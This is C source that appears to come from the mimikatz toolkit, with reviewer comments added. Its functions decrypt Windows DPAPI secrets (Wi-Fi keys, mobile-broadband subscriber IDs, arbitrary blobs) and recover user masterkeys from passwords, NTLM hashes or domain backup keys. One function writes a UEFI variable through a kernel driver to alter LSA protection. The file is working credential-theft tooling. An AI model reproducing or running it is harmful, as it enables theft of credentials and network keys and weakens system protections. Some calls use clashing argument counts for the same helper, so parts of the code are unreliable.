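/*
 * Decrypts the DPAPI-protected SubscriberID stored in a Windows WWAN (mobile
 * broadband) XML profile passed with /in:file.
 *
 * The profile is read as ANSI text and widened to UTF-16; the Name, AccessString
 * and SubscriberID elements are then pulled out with the quick-XML helper. The
 * SubscriberID hex string is turned into a buffer, parsed and described as a
 * DPAPI blob, and decrypted by kuhl_m_dpapi_unprotect_raw_or_blob, which takes
 * its key material from the remaining command-line arguments. The plaintext is
 * printed as hex and then as a UTF-16 string bounded by its byte length.
 *
 * Every buffer handed out by a helper (pFile, dataU, dataF, hex, dataOut, blob)
 * is released on the path that obtained it. Always returns STATUS_SUCCESS;
 * failures are reported through PRINT_ERROR / PRINT_ERROR_AUTO only.
 */
NTSTATUS kuhl_m_dpapi_wwan(int argc, wchar_t * argv[])
{
	PBYTE pFile, hex, dataOut;
	DWORD dwData, lenHex, lenDataOut;
	LPWSTR dataU, dataF;
	LPCWSTR infile;
	PKULL_M_DPAPI_BLOB blob;

	if(kull_m_string_args_byName(argc, argv, L"in", &infile, NULL))
	{
		if(kull_m_file_readData(infile, &pFile, &dwData))
		{
			/* NOTE(review): relies on the read buffer being NUL-terminated (or on the
			 * converter tolerating its absence) -- confirm in kull_m_file_readData */
			if(dataU = kull_m_string_qad_ansi_to_unicode((const char *) pFile))
			{
				if(kull_m_string_quickxml_simplefind(dataU, L"Name", &dataF))
				{
					kprintf(L"Profile \'%s\'\n\n", dataF);
					LocalFree(dataF);
				}
				if(kull_m_string_quickxml_simplefind(dataU, L"AccessString", &dataF))
				{
					kprintf(L" * AccessString : %s\n", dataF);
					LocalFree(dataF);
				}
				if(kull_m_string_quickxml_simplefind(dataU, L"SubscriberID", &dataF))
				{
					if(kull_m_string_stringToHexBuffer(dataF, &hex, &lenHex))
					{
						if(blob = kull_m_dpapi_blob_create(hex))
						{
							kprintf(L"\n");
							kull_m_dpapi_blob_descr(0, blob);
							if(kuhl_m_dpapi_unprotect_raw_or_blob(hex, lenHex, NULL, argc, argv, NULL, 0, (LPVOID *) &dataOut, &lenDataOut, NULL))
							{
								kprintf(L" * SubscriberID : ");
								kull_m_string_wprintf_hex(dataOut, lenDataOut, 0);
								kprintf(L"\n");
								/* "%.*s" reads an int precision, but lenDataOut / sizeof(wchar_t) is a
								 * size_t: narrow it explicitly instead of pushing a 64-bit value where the
								 * formatter reads a 32-bit int (undefined behaviour in the varargs call). */
								kprintf(L"%.*s", (int) (lenDataOut / sizeof(wchar_t)), (PCWSTR) dataOut);
								LocalFree(dataOut);
							}
							kull_m_dpapi_blob_delete(blob);
						}
						LocalFree(hex);
					}
					LocalFree(dataF);
				}
				LocalFree(dataU);
			}
			LocalFree(pFile);
		}
		else PRINT_ERROR_AUTO(L"kull_m_file_readData");
	}
	else PRINT_ERROR(L"Input Wwan XML profile needed (/in:file)\n");
	return STATUS_SUCCESS;
}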
/*
 * Encrypts a string with DPAPI in the current user (or machine) context and
 * shows the resulting blob.
 *
 * Arguments: /data (default: MIMIKATZ), /description, /entropy:<hex>,
 * /machine (adds CRYPTPROTECT_LOCAL_MACHINE), /prompt (passes a
 * CRYPTPROTECT_PROMPTSTRUCT requesting a prompt on protect and unprotect),
 * /out:file to write the raw blob instead of printing it, and /c to select dump
 * mode 2 of kull_m_string_wprintf_hex (mode 1 otherwise, 16 bytes per line via
 * the high word). The length handed to CryptProtectData includes the
 * terminating NUL of the input string.
 *
 * Always returns STATUS_SUCCESS; a CryptProtectData failure is reported with
 * PRINT_ERROR_AUTO.
 */
NTSTATUS kuhl_m_dpapi_protect(int argc, wchar_t * argv[])
{
	DATA_BLOB plain, cipher, entropy = {0, NULL};
	PKULL_M_DPAPI_BLOB parsed;
	PCWSTR description = NULL, shownDescription, entropyHex, outPath;
	CRYPTPROTECT_PROMPTSTRUCT promptInfo = {sizeof(CRYPTPROTECT_PROMPTSTRUCT), CRYPTPROTECT_PROMPT_ON_PROTECT | CRYPTPROTECT_PROMPT_ON_UNPROTECT | CRYPTPROTECT_PROMPT_STRONG, NULL, MIMIKATZ};
	CRYPTPROTECT_PROMPTSTRUCT *prompt = NULL;
	DWORD protectFlags = 0, hexMode;

	kull_m_string_args_byName(argc, argv, L"data", (PCWSTR *) &plain.pbData, MIMIKATZ);
	kull_m_string_args_byName(argc, argv, L"description", &description, NULL);
	if(kull_m_string_args_byName(argc, argv, L"entropy", &entropyHex, NULL))
		kull_m_string_stringToHexBuffer(entropyHex, &entropy.pbData, &entropy.cbData);
	if(kull_m_string_args_byName(argc, argv, L"machine", NULL, NULL))
		protectFlags |= CRYPTPROTECT_LOCAL_MACHINE;
	if(kull_m_string_args_byName(argc, argv, L"prompt", NULL, NULL))
		prompt = &promptInfo;
	hexMode = kull_m_string_args_byName(argc, argv, L"c", NULL, NULL) ? 2 : 1;
	shownDescription = description ? description : L"";

	kprintf(L"\ndata : %s\n", plain.pbData);
	kprintf(L"description : %s\n", shownDescription);
	kprintf(L"flags : ");
	kull_m_dpapi_displayProtectionFlags(protectFlags);
	kprintf(L"\n");
	kprintf(L"prompt flags: ");
	if(prompt)
		kull_m_dpapi_displayPromptFlags(prompt->dwPromptFlags);
	kprintf(L"\n");
	kprintf(L"entropy : ");
	kull_m_string_wprintf_hex(entropy.pbData, entropy.cbData, 0);
	kprintf(L"\n\n");

	/* byte length of the input, terminating NUL included */
	plain.cbData = (DWORD) ((wcslen((PCWSTR) plain.pbData) + 1) * sizeof(wchar_t));
	if(!CryptProtectData(&plain, description, &entropy, NULL, prompt, protectFlags, &cipher))
	{
		PRINT_ERROR_AUTO(L"CryptProtectData");
	}
	else
	{
		if(parsed = kull_m_dpapi_blob_create(cipher.pbData))
		{
			kull_m_dpapi_blob_descr(parsed);
			kull_m_dpapi_blob_delete(parsed);
		}
		kprintf(L"\n");
		if(!kull_m_string_args_byName(argc, argv, L"out", &outPath, NULL))
		{
			kprintf(L"Blob:\n");
			kull_m_string_wprintf_hex(cipher.pbData, cipher.cbData, hexMode | (16 << 16));
			kprintf(L"\n");
		}
		else if(kull_m_file_writeData(outPath, cipher.pbData, cipher.cbData))
			kprintf(L"Write to file \'%s\' is OK\n", outPath);
		LocalFree(cipher.pbData);
	}
	if(entropy.pbData)
		LocalFree(entropy.pbData);
	return STATUS_SUCCESS;
}
/*
 * Sets a firmware (UEFI) variable through the mimidrv kernel driver
 * (IOCTL_MIMIDRV_SYSENVSET) rather than through the user-mode
 * NtSetSystemEnvironmentValueEx path of kuhl_m_sysenv_set.
 *
 * Arguments: /name (default Kernel_Lsa_Ppl_Config), /guid (default
 * {77fa9abd-0359-4d32-bd60-28f4e78f784b}), /attributes (default 1, parsed with
 * wcstoul base 0) and /data:<hex> (default 00000000). The request sent to the
 * driver is a MIMIDRV_VARIABLE_NAME_AND_VALUE header followed by the
 * NUL-terminated name and then the value bytes; ValueOffset points at the value.
 * Name, GUID, attributes and data are echoed before the IOCTL is issued.
 *
 * Always returns STATUS_SUCCESS. A malformed GUID string is reported with
 * PRINT_ERROR; a bad hex string, a failed allocation or a failed IOCTL are
 * silent apart from the missing "> OK!".
 */
NTSTATUS kuhl_m_kernel_sysenv_set(int argc, wchar_t * argv[])
{
	NTSTATUS status;
	LPCWSTR varName, vendorGuidText, attributesText, valueHex;
	UNICODE_STRING uVarName, uVendorGuid;
	GUID vendorGuid;
	LPBYTE value = NULL;
	DWORD valueLen, attributes, nameBytes, valueOffset, requestSize;
	PMIMIDRV_VARIABLE_NAME_AND_VALUE request;

	kull_m_string_args_byName(argc, argv, L"name", &varName, L"Kernel_Lsa_Ppl_Config");
	kull_m_string_args_byName(argc, argv, L"guid", &vendorGuidText, L"{77fa9abd-0359-4d32-bd60-28f4e78f784b}");
	kull_m_string_args_byName(argc, argv, L"attributes", &attributesText, L"1");
	kull_m_string_args_byName(argc, argv, L"data", &valueHex, L"00000000");
	RtlInitUnicodeString(&uVarName, varName);
	RtlInitUnicodeString(&uVendorGuid, vendorGuidText);
	attributes = wcstoul(attributesText, NULL, 0);

	status = RtlGUIDFromString(&uVendorGuid, &vendorGuid);
	if(!NT_SUCCESS(status))
	{
		PRINT_ERROR(L"RtlGUIDFromString: 0x%08x\n", status);
		return STATUS_SUCCESS;
	}

	kprintf(L"Name : %wZ\nVendor GUID: ", &uVarName);
	kuhl_m_sysenv_display_vendorGuid(&vendorGuid);
	kprintf(L"\nAttributes : %08x (", attributes);
	kuhl_m_sysenv_display_attributes(attributes);
	kprintf(L")\n");

	if(kull_m_string_stringToHexBuffer(valueHex, &value, &valueLen))
	{
		kprintf(L"Length : %u\nData : ", valueLen);
		kull_m_string_wprintf_hex(value, valueLen, 1);
		kprintf(L"\n\n");

		/* layout: fixed header | name (with NUL) | value */
		nameBytes = ((DWORD) wcslen(varName) + 1) * sizeof(wchar_t);
		valueOffset = FIELD_OFFSET(MIMIDRV_VARIABLE_NAME_AND_VALUE, Name) + nameBytes;
		requestSize = valueOffset + valueLen;
		if(request = (PMIMIDRV_VARIABLE_NAME_AND_VALUE) LocalAlloc(LPTR, requestSize))
		{
			request->Attributes = attributes;
			RtlCopyMemory(&request->VendorGuid, &vendorGuid, sizeof(GUID));
			request->ValueLength = valueLen;
			request->ValueOffset = valueOffset;
			RtlCopyMemory(request->Name, varName, nameBytes);
			RtlCopyMemory((PBYTE) request + valueOffset, value, valueLen);
			if(kull_m_kernel_mimidrv_simple_output(IOCTL_MIMIDRV_SYSENVSET, request, requestSize))
				kprintf(L"> OK!\n");
			LocalFree(request);
		}
		LocalFree(value);
	}
	return STATUS_SUCCESS;
}
/*
 * Sets a firmware (UEFI) variable from user mode with
 * NtSetSystemEnvironmentValueEx.
 *
 * Arguments: /name (default MIMIKATZ), /guid (default
 * {b16b00b5-cafe-babe-0ee0-dabadabad000}), /attributes (default 1, parsed with
 * wcstoul base 0) and /data:<hex>; the default data decodes to the UTF-16LE
 * string "A La Vie, A L'Amour" followed by its terminator. Name, GUID,
 * attributes and data are echoed before the call.
 *
 * Always returns STATUS_SUCCESS. A malformed GUID and a failing
 * NtSetSystemEnvironmentValueEx are reported with PRINT_ERROR; a bad hex string
 * is silent.
 */
NTSTATUS kuhl_m_sysenv_set(int argc, wchar_t * argv[])
{
	NTSTATUS status;
	LPCWSTR varName, vendorGuidText, attributesText, valueHex;
	UNICODE_STRING uVarName, uVendorGuid;
	GUID vendorGuid;
	LPBYTE value;
	DWORD valueLen, attributes;

	kull_m_string_args_byName(argc, argv, L"name", &varName, MIMIKATZ);
	kull_m_string_args_byName(argc, argv, L"guid", &vendorGuidText, L"{b16b00b5-cafe-babe-0ee0-dabadabad000}");
	kull_m_string_args_byName(argc, argv, L"attributes", &attributesText, L"1");
	kull_m_string_args_byName(argc, argv, L"data", &valueHex, L"410020004c00610020005600690065002c002000410020004c00270041006d006f00750072000000");
	RtlInitUnicodeString(&uVarName, varName);
	RtlInitUnicodeString(&uVendorGuid, vendorGuidText);
	attributes = wcstoul(attributesText, NULL, 0);

	status = RtlGUIDFromString(&uVendorGuid, &vendorGuid);
	if(!NT_SUCCESS(status))
	{
		PRINT_ERROR(L"RtlGUIDFromString: 0x%08x\n", status);
		return STATUS_SUCCESS;
	}

	kprintf(L"Name : %wZ\nVendor GUID: ", &uVarName);
	kuhl_m_sysenv_display_vendorGuid(&vendorGuid);
	kprintf(L"\nAttributes : %08x (", attributes);
	kuhl_m_sysenv_display_attributes(attributes);
	kprintf(L")\n");

	if(kull_m_string_stringToHexBuffer(valueHex, &value, &valueLen))
	{
		kprintf(L"Length : %u\nData : ", valueLen);
		kull_m_string_wprintf_hex(value, valueLen, 1);
		kprintf(L"\n\n");
		status = NtSetSystemEnvironmentValueEx(&uVarName, &vendorGuid, value, valueLen, attributes);
		if(!NT_SUCCESS(status))
			PRINT_ERROR(L"NtSetSystemEnvironmentValueEx(data): 0x%08x\n", status);
		else kprintf(L"> OK!\n");
		LocalFree(value);
	}
	return STATUS_SUCCESS;
}
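/*
 * Recovers the keys contained in a DPAPI masterkey file given with /in:file.
 *
 * Depending on the other arguments, up to three parts of the file are handled:
 *  - the user MasterKey, with /password (derived with the SID from /sid, and
 *    /protected selecting the protected-user derivation) and/or with /hash (a
 *    user hash whose type is only guessed from its length: LM_NTLM_HASH_LENGTH
 *    or SHA_DIGEST_LENGTH);
 *  - the BackupKey, without any secret when bit 0 of dwFlags is clear, or with
 *    the DPAPI_SYSTEM secret from /system:<hex> when it is set;
 *  - the DomainKey, with the RSA private key read from the PVK file named by
 *    /domainpvk.
 * /sid is normalised through ConvertStringSidToSid / ConvertSidToStringSid; the
 * MasterKey and BackupKey paths are skipped entirely when no SID is usable.
 *
 * Each successful decryption is printed by kuhl_m_dpapi_displayInfosAndFree,
 * which also owns the output buffer. Always returns STATUS_SUCCESS.
 */
NTSTATUS kuhl_m_dpapi_masterkey(int argc, wchar_t * argv[])
{
	PKULL_M_DPAPI_MASTERKEYS masterkeys;
	PBYTE buffer;
	PPVK_FILE_HDR pvkBuffer;
	DWORD szBuffer, szPvkBuffer;
	LPCWSTR szIn = NULL, szSid = NULL, szPassword = NULL, szHash = NULL, szSystem = NULL, szDomainpvk = NULL;
	BOOL isProtected = kull_m_string_args_byName(argc, argv, L"protected", NULL, NULL);
	PWSTR convertedSid = NULL;
	PSID pSid = NULL;
	PBYTE pHash = NULL, pSystem = NULL;
	DWORD cbHash = 0, cbSystem = 0;
	PVOID output;
	DWORD cbOutput;

	if(kull_m_string_args_byName(argc, argv, L"in", &szIn, NULL))
	{
		kull_m_string_args_byName(argc, argv, L"sid", &szSid, NULL);
		kull_m_string_args_byName(argc, argv, L"password", &szPassword, NULL);
		kull_m_string_args_byName(argc, argv, L"hash", &szHash, NULL);
		kull_m_string_args_byName(argc, argv, L"system", &szSystem, NULL);
		kull_m_string_args_byName(argc, argv, L"domainpvk", &szDomainpvk, NULL);
		if(kull_m_file_readData(szIn, &buffer, &szBuffer))
		{
			if(masterkeys = kull_m_dpapi_masterkeys_create(buffer))
			{
				//kull_m_dpapi_masterkeys_descr(masterkeys);
				/* round-trip the SID text through a binary SID to get its canonical form */
				if(szSid)
				{
					if(ConvertStringSidToSid(szSid, &pSid))
					{
						ConvertSidToStringSid(pSid, &convertedSid);
						LocalFree(pSid);
					}
					else PRINT_ERROR_AUTO(L"ConvertStringSidToSid");
				}
				if(szHash)
					kull_m_string_stringToHexBuffer(szHash, &pHash, &cbHash);
				if(szSystem)
					kull_m_string_stringToHexBuffer(szSystem, &pSystem, &cbSystem);

				/* both user-key derivations need the SID */
				if(convertedSid)
				{
					if(masterkeys->MasterKey && masterkeys->dwMasterKeyLen)
					{
						if(szPassword)
						{
							kprintf(L"\n[masterkey] with password: %s (%s user)\n", szPassword, isProtected ? L"protected" : L"normal");
							if(kull_m_dpapi_unprotect_masterkey_with_password(masterkeys->dwFlags, masterkeys->MasterKey, szPassword, convertedSid, isProtected, &output, &cbOutput))
								kuhl_m_dpapi_displayInfosAndFree(output, cbOutput, NULL);
							else PRINT_ERROR(L"kull_m_dpapi_unprotect_masterkey_with_password\n");
						}
						if(pHash)
						{
							kprintf(L"\n[masterkey] with hash: ");
							kull_m_string_wprintf_hex(pHash, cbHash, 0);
							/* the hash type is only inferred from its byte length */
							if(cbHash == LM_NTLM_HASH_LENGTH)
								kprintf(L" (ntlm type)\n");
							else if(cbHash == SHA_DIGEST_LENGTH)
								kprintf(L" (sha1 type)\n");
							else kprintf(L" (?)\n");
							if(kull_m_dpapi_unprotect_masterkey_with_userHash(masterkeys->MasterKey, pHash, cbHash, convertedSid, &output, &cbOutput))
								kuhl_m_dpapi_displayInfosAndFree(output, cbOutput, NULL);
							else PRINT_ERROR(L"kull_m_dpapi_unprotect_masterkey_with_userHash\n");
						}
					}
					if(masterkeys->BackupKey && masterkeys->dwBackupKeyLen)
					{
						/* bit 0 of dwFlags: the BackupKey can only be opened with the DPAPI_SYSTEM secret */
						if(!(masterkeys->dwFlags & 1) || (pSystem && cbSystem))
						{
							kprintf(L"\n[backupkey] %s DPAPI_SYSTEM: ", pSystem ? L"with" : L"without");
							if(pSystem)
								kull_m_string_wprintf_hex(pSystem, cbSystem, 0);
							kprintf(L"\n");
							if(kull_m_dpapi_unprotect_backupkey_with_secret(masterkeys->dwFlags, masterkeys->BackupKey, convertedSid, pSystem, cbSystem, &output, &cbOutput))
								kuhl_m_dpapi_displayInfosAndFree(output, cbOutput, NULL);
							else PRINT_ERROR(L"kull_m_dpapi_unprotect_backupkey_with_secret\n");
						}
					}
					LocalFree(convertedSid);
				}
				if(pHash)
					LocalFree(pHash);
				if(pSystem)
					LocalFree(pSystem);

				if(szDomainpvk && masterkeys->DomainKey && masterkeys->dwDomainKeyLen)
				{
					kprintf(L"\n[domainkey] with RSA private key\n");
					if(kull_m_file_readData(szDomainpvk, (PBYTE *) &pvkBuffer, &szPvkBuffer))
					{
						/* The header and the key length it announces both come from the file:
						 * check them against the byte count actually read before the header is
						 * dereferenced and the key is sliced out behind it.
						 * NOTE(review): the key is assumed to start right after the header, i.e.
						 * an unencrypted PVK without salt -- confirm against the PVK layout. */
						if((szPvkBuffer >= sizeof(PVK_FILE_HDR)) && (pvkBuffer->cbPvk <= szPvkBuffer - sizeof(PVK_FILE_HDR)))
						{
							if(kull_m_dpapi_unprotect_domainkey_with_key(masterkeys->DomainKey, (PBYTE) pvkBuffer + sizeof(PVK_FILE_HDR), pvkBuffer->cbPvk, &output, &cbOutput, &pSid))
								kuhl_m_dpapi_displayInfosAndFree(output, cbOutput, pSid);
							else PRINT_ERROR(L"kull_m_dpapi_unprotect_domainkey_with_key\n");
						}
						else PRINT_ERROR(L"PVK file too short for its header or announced key length (%u byte(s) read)\n", szPvkBuffer);
						LocalFree(pvkBuffer);
					}
				}
				kull_m_dpapi_masterkeys_delete(masterkeys);
			}
			LocalFree(buffer);
		}
		else PRINT_ERROR_AUTO(L"kull_m_file_readData");
	}
	else PRINT_ERROR(L"Input masterkeys file needed (/in:file)\n");
	return STATUS_SUCCESS;
}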
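/*
 * Decrypts a DPAPI blob read from /in:file.
 *
 * With /masterkey:<hex> the blob is decrypted offline by
 * kull_m_dpapi_unprotect_blob using that masterkey, the optional /entropy:<hex>
 * and /password. Without it CryptUnprotectData is called in the current user
 * context, with /prompt attaching a CRYPTPROTECT_PROMPTSTRUCT. The /machine flag
 * is parsed and displayed but CryptUnprotectData receives dwFlags = 0, so it has
 * no effect on the decryption. The result is written to /out:file, or printed
 * as text when kull_m_string_suspectUnicodeString accepts it and as hex
 * otherwise.
 *
 * Always returns STATUS_SUCCESS; failures are reported with PRINT_ERROR /
 * PRINT_ERROR_AUTO (the offline path reports nothing itself on failure).
 */
NTSTATUS kuhl_m_dpapi_unprotect(int argc, wchar_t * argv[])
{
	DATA_BLOB dataIn, dataOut, dataEntropy = {0, NULL};
	PKULL_M_DPAPI_BLOB blob;
	PCWSTR szEntropy, outfile, infile, szMasterkey, szPassword = NULL;
	PWSTR description = NULL;
	CRYPTPROTECT_PROMPTSTRUCT promptStructure = {sizeof(CRYPTPROTECT_PROMPTSTRUCT), CRYPTPROTECT_PROMPT_ON_PROTECT | CRYPTPROTECT_PROMPT_ON_UNPROTECT | CRYPTPROTECT_PROMPT_STRONG, NULL, MIMIKATZ}, *pPrompt;
	DWORD flags = 0;
	UNICODE_STRING uString;
	BOOL statusDecrypt = FALSE;
	PBYTE masterkey = NULL;
	DWORD masterkeyLen = 0;

	if(kull_m_string_args_byName(argc, argv, L"entropy", &szEntropy, NULL))
		kull_m_string_stringToHexBuffer(szEntropy, &dataEntropy.pbData, &dataEntropy.cbData);
	if(kull_m_string_args_byName(argc, argv, L"machine", NULL, NULL))
		flags |= CRYPTPROTECT_LOCAL_MACHINE;
	pPrompt = kull_m_string_args_byName(argc, argv, L"prompt", NULL, NULL) ? &promptStructure : NULL;
	if(kull_m_string_args_byName(argc, argv, L"masterkey", &szMasterkey, NULL))
		kull_m_string_stringToHexBuffer(szMasterkey, &masterkey, &masterkeyLen);
	kull_m_string_args_byName(argc, argv, L"password", &szPassword, NULL);

	kprintf(L"\nflags : ");
	kull_m_dpapi_displayProtectionFlags(flags);
	kprintf(L"\n");
	kprintf(L"prompt flags: ");
	if(pPrompt)
		kull_m_dpapi_displayPromptFlags(pPrompt->dwPromptFlags);
	kprintf(L"\n");
	kprintf(L"entropy : ");
	kull_m_string_wprintf_hex(dataEntropy.pbData, dataEntropy.cbData, 0);
	kprintf(L"\n");
	kprintf(L"masterkey : ");
	kull_m_string_wprintf_hex(masterkey, masterkeyLen, 0);
	kprintf(L"\n");
	kprintf(L"password : %s\n\n", szPassword ? szPassword : L"");

	if(kull_m_string_args_byName(argc, argv, L"in", &infile, NULL))
	{
		if(kull_m_file_readData(infile, &dataIn.pbData, &dataIn.cbData))
		{
			if(blob = kull_m_dpapi_blob_create(dataIn.pbData))
			{
				kull_m_dpapi_blob_descr(blob);
				if(masterkey && masterkeyLen)
					statusDecrypt = kull_m_dpapi_unprotect_blob(blob, masterkey, masterkeyLen, dataEntropy.pbData, dataEntropy.cbData, szPassword, (LPVOID *) &dataOut.pbData, &dataOut.cbData);
				else
					statusDecrypt = CryptUnprotectData(&dataIn, &description, &dataEntropy, NULL, pPrompt, 0, &dataOut);
				if(statusDecrypt)
				{
					/* only the CryptUnprotectData path fills description */
					if(description)
					{
						kprintf(L"description : %s\n", description);
						LocalFree(description);
					}
					if(kull_m_string_args_byName(argc, argv, L"out", &outfile, NULL))
					{
						if(kull_m_file_writeData(outfile, dataOut.pbData, dataOut.cbData))
							kprintf(L"Write to file \'%s\' is OK\n", outfile);
					}
					else
					{
						uString.Length = uString.MaximumLength = (USHORT) dataOut.cbData;
						uString.Buffer = (PWSTR) dataOut.pbData;
						kprintf(L"data - ");
						/* The size test has to run on the untruncated DWORD: uString.Length is a
						 * USHORT and can never exceed USHRT_MAX, so the former comparison on it was
						 * always true and a result above 64 KiB was examined through a wrapped length.
						 * NOTE(review): "%s" on pbData assumes suspectUnicodeString checked for a
						 * terminating NUL inside the buffer -- confirm in kull_m_string. */
						if((dataOut.cbData <= USHRT_MAX) && kull_m_string_suspectUnicodeString(&uString))
							kprintf(L"text : %s", dataOut.pbData);
						else
						{
							kprintf(L"hex : ");
							kull_m_string_wprintf_hex(dataOut.pbData, dataOut.cbData, 1 | (16 << 16));
						}
						kprintf(L"\n");
					}
					LocalFree(dataOut.pbData);
				}
				else if(!masterkey) PRINT_ERROR_AUTO(L"CryptUnprotectData");
				kull_m_dpapi_blob_delete(blob);
			}
			LocalFree(dataIn.pbData);
		}
		else PRINT_ERROR_AUTO(L"kull_m_file_readData");
	}
	else PRINT_ERROR(L"Input file needed (/in:file)\n");
	if(dataEntropy.pbData)
		LocalFree(dataEntropy.pbData);
	if(masterkey)
		LocalFree(masterkey);
	return STATUS_SUCCESS;
}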
/*
 * Prints the decrypted key material of a WLAN profile.
 *
 * keyHex is the <keyMaterial> text (a hex-encoded DPAPI blob). It is turned
 * into bytes, described as a blob and decrypted through
 * kuhl_m_dpapi_unprotect_raw_or_blob, which reads its key sources from
 * argc/argv. WEP keys are dumped as hex; anything else goes through "%.*S"
 * (narrow string, bounded by the decrypted length). Nothing is printed when a
 * step fails. Every intermediate buffer is released on the path that got it.
 */
static void kuhl_m_dpapi_wifi_showKeyMaterial(LPWSTR authentication, LPWSTR keyHex, int argc, wchar_t * argv[])
{
	PBYTE encrypted, plain;
	DWORD encryptedLen, plainLen;
	PKULL_M_DPAPI_BLOB parsed;

	if(!kull_m_string_stringToHexBuffer(keyHex, &encrypted, &encryptedLen))
		return;
	if(parsed = kull_m_dpapi_blob_create(encrypted))
	{
		kprintf(L"\n");
		kull_m_dpapi_blob_descr(0, parsed);
		if(kuhl_m_dpapi_unprotect_raw_or_blob(encrypted, encryptedLen, NULL, argc, argv, NULL, 0, (LPVOID *) &plain, &plainLen, NULL))
		{
			kprintf(L" * Key Material : ");
			if(_wcsicmp(authentication, L"WEP") == 0)
			{
				kprintf(L"(hex) ");
				kull_m_string_wprintf_hex(plain, plainLen, 0);
			}
			else kprintf(L"%.*S", plainLen, plain);
			kprintf(L"\n");
			LocalFree(plain);
		}
		kull_m_dpapi_blob_delete(parsed);
	}
	LocalFree(encrypted);
}

/*
 * Shows a Windows WLAN XML profile (/in:file) and decrypts its key material.
 *
 * The file is read as ANSI text and widened to UTF-16, then the profile name,
 * the SSID (name or hex form), the authentication and encryption settings and
 * the keyMaterial element are located with the quick-XML helper. The encryption
 * and key-material parts are only looked at when an <authentication> element is
 * present. Decryption itself is done by kuhl_m_dpapi_wifi_showKeyMaterial.
 *
 * Always returns STATUS_SUCCESS; a missing /in argument or an unreadable file is
 * reported with PRINT_ERROR / PRINT_ERROR_AUTO.
 */
NTSTATUS kuhl_m_dpapi_wifi(int argc, wchar_t * argv[])
{
	PBYTE fileBytes;
	DWORD fileLen;
	LPWSTR xml, ssidNode, field, authentication;
	LPCWSTR profilePath;

	if(!kull_m_string_args_byName(argc, argv, L"in", &profilePath, NULL))
	{
		PRINT_ERROR(L"Input Wlan XML profile needed (/in:file)\n");
		return STATUS_SUCCESS;
	}
	if(!kull_m_file_readData(profilePath, &fileBytes, &fileLen))
	{
		PRINT_ERROR_AUTO(L"kull_m_file_readData");
		return STATUS_SUCCESS;
	}

	if(xml = kull_m_string_qad_ansi_to_unicode((const char *) fileBytes))
	{
		if(kull_m_string_quickxml_simplefind(xml, L"name", &field))
		{
			kprintf(L"Profile \'%s\'\n\n", field);
			LocalFree(field);
		}
		if(kull_m_string_quickxml_simplefind(xml, L"SSID", &ssidNode))
		{
			kprintf(L" * SSID ");
			if(kull_m_string_quickxml_simplefind(ssidNode, L"name", &field))
			{
				kprintf(L"name : %s\n", field);
				LocalFree(field);
			}
			else if(kull_m_string_quickxml_simplefind(ssidNode, L"hex", &field))
			{
				kprintf(L"hex : %s\n", field);
				LocalFree(field);
			}
			else kprintf(L"?\n");
			LocalFree(ssidNode);
		}
		if(kull_m_string_quickxml_simplefind(xml, L"authentication", &authentication))
		{
			kprintf(L" * Authentication: %s\n", authentication);
			if(kull_m_string_quickxml_simplefind(xml, L"encryption", &field))
			{
				kprintf(L" * Encryption : %s\n", field);
				LocalFree(field);
			}
			if(kull_m_string_quickxml_simplefind(xml, L"keyMaterial", &field))
			{
				kuhl_m_dpapi_wifi_showKeyMaterial(authentication, field, argc, argv);
				LocalFree(field);
			}
			LocalFree(authentication);
		}
		LocalFree(xml);
	}
	LocalFree(fileBytes);
	return STATUS_SUCCESS;
}